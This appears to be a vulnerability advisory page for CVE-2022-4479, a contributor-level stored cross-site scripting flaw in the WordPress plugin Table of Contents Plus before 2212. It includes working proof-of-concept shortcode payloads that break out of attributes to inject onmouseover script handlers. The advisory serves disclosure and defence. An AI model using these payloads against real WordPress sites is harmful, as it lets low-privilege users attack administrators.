Lucene search
Lana CodesWPEX-ID:10F63D30-1B36-459B-80EB-509CAAF5D377HistoryDec 19, 2022 - 12:00 a.m.
Table of Contents Plus < 2212 - Contributor+ Stored XSS
2022-12-1900:00:00
Lana Codes
106
xss
table of contents plus
contributor
stored
EPSS
0.001
Percentile
25.4%
The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.
[toc heading_levels='1' class='" onmouseover="alert(/XSS/)']
<h1>XSS</h1>
content
<h1>XSS</h1>
content
<h1>XSS</h1>
content
<h1>XSS</h1>
content
Note: it is only generated by the shortcode if there is content for the TOC, so it must be used together, and it needs at least 4 header tags to work.
[sitemap_pages heading='1" style=position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px onmouseover=alert(/XSS/)//']
[sitemap_categories heading='1" style=position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px onmouseover=alert(/XSS/)//']Related
cve
cve
CVE-2022-4479
2023-01-09 23:15:28
cvelist
cvelist
CVE-2022-4479 Table of Contents Plus < 2212 - Contributor+ Stored XSS
2023-01-09 22:13:33
nvd
nvd
CVE-2022-4479
2023-01-09 23:15:28
prion
prion
Cross site scripting
2023-01-09 23:15:00
wpvulndb
wpvulndb
Table of Contents Plus < 2212 - Contributor+ Stored XSS
2022-12-19 00:00:00
openvas
openvas
WordPress Table of Contents Plus Plugin < 2212 XSS Vulnerability
2023-01-23 00:00:00